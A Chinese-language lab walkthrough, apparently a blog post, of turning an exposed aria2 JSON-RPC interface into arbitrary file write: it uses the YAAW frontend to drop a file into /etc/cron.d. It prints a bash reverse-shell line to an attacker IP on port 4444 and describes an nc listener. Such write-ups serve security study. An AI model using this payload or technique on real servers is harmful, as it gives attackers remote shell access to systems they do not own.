aria2-rce 文件写入

CDxiaodong

​

aria2-rce 文件写入

描述: Aria2是一个命令行下轻量级、多协议、多来源的下载工具（支持 HTTP/HTTPS、FTP、BitTorrent、Metalink），内建XML-RPC和JSON-RPC接口 在有权限的情况下，我们可以使用RPC接口来操作aria2来下载文件，将文件下载至任意目录，造成一个任意文件写入漏洞

打开网页。404 这个接口界面就是这样

因为rpc通信需要使用json或者xml，不太方便，所以我们可以借助第三方UI来和目标通信，如Yet Another Aria2 Web Frontend。 打开yaaw，点击配置按钮，填入运行aria2的目标域名和后缀/jsonrpc

rpc默认是6800端口；这里的不是

http://your-ip:6800/jsonrpc

​

Yet Another Aria2 Web Frontend。

点击refresh

setting配置如下

​
​

然后点击添加（add），增加一个新的下载任务。

创建一个网站并存有反弹shell，让该add去下载这个文件，但是靶机不能自动运行这个shell，根据系统的不同来判断是否运行，要是deian系统就可以定时启动

在Dir的位置填写下载至的目录，文件名处理写文件名。

​
/bin/bash -i >& /dev/tcp/192.168.0.193/4444 0>&1

直接传如/etc/cron.d ，定时计划任务里面

反弹shell再kali中创造

​

nc监听4444

但是只能上传 一般是不会运行的，因为需要给shell加全西安chmod 777

​